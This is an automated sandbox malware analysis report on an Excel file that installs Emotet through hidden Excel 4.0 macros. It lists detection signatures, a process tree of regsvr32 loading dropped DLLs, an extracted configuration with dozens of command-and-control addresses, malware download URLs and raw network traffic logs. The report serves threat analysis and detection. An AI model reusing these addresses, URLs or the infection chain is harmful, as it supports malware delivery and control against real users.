Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4470_02112022.xls

Overview

General Information

Sample Name:4470_02112022.xls
Analysis ID:746417
MD5:d3b182de8c99553a9f2b6d0f3f030a4f
SHA1:d5bd989ffde2f67133b6404f9f234d13e618c206
SHA256:cd99b899c5a3d6ddb22969605b079375da897362b4d599fc9eebb1e21115a31d
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Outdated Microsoft Office dropper detected
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Drops files with a non-matching file extension (content does not match file extension)
Found inlined nop instructions (likely shell or obfuscated code)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1152 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 316 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1292 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2192 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2352 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2688 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 2300 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\XXKTOC\CASBb.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["218.38.121.17:443", "186.250.48.5:443", "80.211.107.116:8080", "174.138.33.49:7080", "165.22.254.236:8080", "185.148.169.10:8080", "62.171.178.147:8080", "128.199.217.206:443", "210.57.209.142:8080", "36.67.23.59:443", "160.16.143.191:8080", "128.199.242.164:8080", "178.238.225.252:8080", "118.98.72.86:443", "202.134.4.210:7080", "82.98.180.154:7080", "54.37.228.122:443", "64.227.55.231:8080", "195.77.239.39:8080", "103.254.12.236:7080", "103.85.95.4:8080", "178.62.112.199:8080", "83.229.80.93:8080", "114.79.130.68:443", "51.75.33.122:443", "139.196.72.155:8080", "188.165.79.151:443", "190.145.8.4:443", "196.44.98.190:8080", "198.199.70.22:8080", "103.56.149.105:8080", "104.244.79.94:443", "87.106.97.83:7080", "103.71.99.57:8080", "46.101.98.60:8080", "103.126.216.86:443", "103.224.241.74:8080", "37.44.244.177:8080", "85.214.67.203:8080", "202.28.34.99:8080", "175.126.176.79:8080", "85.25.120.45:8080", "93.104.209.107:8080", "103.41.204.169:8080", "78.47.204.80:443", "139.59.80.108:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0IMl9QmQAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW38h9QmQAAIg="]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.1211814809.00000000002C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    0000000A.00000002.1213054445.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      0000000A.00000002.1211606431.000000000017A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Yara detected EmotetJoe Security
        00000008.00000002.942096747.00000000001C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000008.00000002.943086830.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.regsvr32.exe.1c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              9.2.regsvr32.exe.2c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                8.2.regsvr32.exe.1c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  10.2.regsvr32.exe.2b0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    10.2.regsvr32.exe.2b0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.22218.38.121.17491804432404328 11/15/22-12:44:34.987459
                      SID:2404328
                      Source Port:49180
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: 4470_02112022.xlsReversingLabs: Detection: 80%
                      Source: 4470_02112022.xlsVirustotal: Detection: 67%Perma Link
                      Source: 4470_02112022.xlsMetadefender: Detection: 31%Perma Link
                      Antivirus / Scanner detection for submitted sample
                      Source: 4470_02112022.xlsAvira: detected
                      Antivirus detection for URL or domain
                      Source: https://www.spinbalence.com/Adapter/moycMR/Avira URL Cloud: Label: malware
                      Source: https://www.spinbalence.com/index.php?controller=404Avira URL Cloud: Label: malware
                      Source: http://navylin.com/bsavxiv/axHQYKl/Avira URL Cloud: Label: malware
                      Source: https://www.3d-stickers.com/page-non-trouveeAvira URL Cloud: Label: malware
                      Source: http://www.spinbalence.com/Adapter/moycMR/Avira URL Cloud: Label: malware
                      Source: http://www.3d-stickers.com/Content/Afa1PcRuxh/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URL
                      Source: www.3d-stickers.comVirustotal: Detection: 12%Perma Link
                      Source: www.spinbalence.comVirustotal: Detection: 12%Perma Link
                      Source: navylin.comVirustotal: Detection: 13%Perma Link
                      Source: sat7ate.comVirustotal: Detection: 14%Perma Link
                      Source: http://navylin.com/bsavxiv/axHQYKl/Virustotal: Detection: 22%Perma Link
                      Source: https://www.3d-stickers.com/page-non-trouveeVirustotal: Detection: 12%Perma Link
                      Source: https://www.spinbalence.com/index.php?controller=404Virustotal: Detection: 10%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllReversingLabs: Detection: 80%
                      Source: C:\Users\user\oxnv4.ooccxxReversingLabs: Detection: 80%
                      Source: C:\Windows\System32\XXKTOC\CASBb.dll (copy)ReversingLabs: Detection: 80%
                      Source: 0000000A.00000002.1211606431.000000000017A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["218.38.121.17:443", "186.250.48.5:443", "80.211.107.116:8080", "174.138.33.49:7080", "165.22.254.236:8080", "185.148.169.10:8080", "62.171.178.147:8080", "128.199.217.206:443", "210.57.209.142:8080", "36.67.23.59:443", "160.16.143.191:8080", "128.199.242.164:8080", "178.238.225.252:8080", "118.98.72.86:443", "202.134.4.210:7080", "82.98.180.154:7080", "54.37.228.122:443", "64.227.55.231:8080", "195.77.239.39:8080", "103.254.12.236:7080", "103.85.95.4:8080", "178.62.112.199:8080", "83.229.80.93:8080", "114.79.130.68:443", "51.75.33.122:443", "139.196.72.155:8080", "188.165.79.151:443", "190.145.8.4:443", "196.44.98.190:8080", "198.199.70.22:8080", "103.56.149.105:8080", "104.244.79.94:443", "87.106.97.83:7080", "103.71.99.57:8080", "46.101.98.60:8080", "103.126.216.86:443", "103.224.241.74:8080", "37.44.244.177:8080", "85.214.67.203:8080", "202.28.34.99:8080", "175.126.176.79:8080", "85.25.120.45:8080", "93.104.209.107:8080", "103.41.204.169:8080", "78.47.204.80:443", "139.59.80.108:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0IMl9QmQAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW38h9QmQAAIg="]}
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100061AC CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49180 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49181 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: unknownHTTPS traffic detected: 163.172.115.127:443 -> 192.168.2.22:49174 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 163.172.108.69:443 -> 192.168.2.22:49177 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,

                      Software Vulnerabilities

                      barindex
                      Document exploit detected (drops PE files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 40hd04O0[1].dll.0.drJump to dropped file
                      Document exploit detected (creates forbidden files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to behavior
                      Document exploit detected (process start blacklist hit)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                      Document exploit detected (UrlDownloadToFile)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                      Source: global trafficDNS query: name: sat7ate.com
                      Source: global trafficDNS query: name: www.spinbalence.com
                      Source: global trafficDNS query: name: www.3d-stickers.com
                      Source: global trafficDNS query: name: navylin.com
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then lea r8, qword ptr [000000001009B410h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then lea rdx, qword ptr [000000001009C2C4h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov rax, qword ptr [rsi]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx eax, byte ptr [rdx]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx eax, byte ptr [rdx]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx eax, byte ptr [rcx+rdx]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp dword ptr [rsp+rax*4+28h], edi
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp dword ptr [rsp+rcx*4+28h], ebx
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov edx, dword ptr [rsp+r8*4+28h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then cmp rcx, r8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov al, bpl
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then sub r11, 01h
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx eax, byte ptr [r8]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov r8, rdi
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movsxd rcx, qword ptr [r12+10h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov rax, r8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx ecx, byte ptr [r10]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then lea rbx, qword ptr [rsp+70h]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movsxd rax, rcx
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then movzx ecx, byte ptr [r10]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov r8d, ebx
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then mov eax, r10d
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 163.172.115.127:80 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 163.172.115.127:80 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 163.172.115.127:80 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:80
                      Source: global trafficTCP traffic: 163.172.108.69:80 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:80
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:80
                      Source: global trafficTCP traffic: 163.172.108.69:80 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:80
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
